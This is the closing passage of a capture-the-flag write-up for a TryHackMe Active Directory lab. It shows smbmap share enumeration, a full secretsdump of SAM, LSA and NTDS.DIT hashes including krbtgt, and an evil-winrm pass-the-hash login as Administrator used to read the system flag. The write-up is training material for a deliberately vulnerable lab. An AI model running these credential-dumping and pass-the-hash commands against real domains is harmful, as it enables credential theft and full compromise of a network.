    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: roasted.thm:445	Name: unknown             	Status: ADMIN!!!   	
[/] Work[!] Unable to remove test directory at \\roasted.thm\SYSVOL\TGZHNXPEAQ, please remove manually
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	READ, WRITE	Remote Admin
    C$                                                	READ, WRITE	Default share
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	READ, WRITE	Logon server share 
    SYSVOL                                            	READ, WRITE	Logon server share 
    VulnNet-Business-Anonymous                        	READ ONLY	VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous                      	READ ONLY	VulnNet Enterprise Sharing

Great, this user is an administrator on the domain controller: we have read/write access to ADMIN$ and C$. (smbmap left a test directory on SYSVOL that it could not delete; on a real engagement remove it by hand.)

Dump the domain hashes with those admin credentials. secretsdump pulls the local SAM and LSA secrets through the remote registry, then uses DRSUAPI replication to read every account’s hash out of NTDS.DIT:

root@ip-10-10-185-72:~# python3 /opt/impacket/examples/secretsdump.py VULNNET-RST.local/a-whitehat:[REDACTED]@roasted.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:ed44407a6793ec47796802e3772169956b36f02f2a5f4d8388e7bdd8dd45c07d
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:2a35e320aeb8eba88b772649024d5de1
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:d6315b5de96ee0ba
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:950b9313a13e4ca30dc044668050bb12:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::

Take the Administrator NT hash and log in over WinRM with pass-the-hash; no cracking is needed, since -H passes the hash directly:

root@ip-10-10-185-72:~# evil-winrm -i roasted.thm -u Administrator -H [REDACTED]

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator

Find the system flag and read it:

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> more system.txt
THM{[REDACTED]}

Do you like this writeup? Check out other THM Writeups.
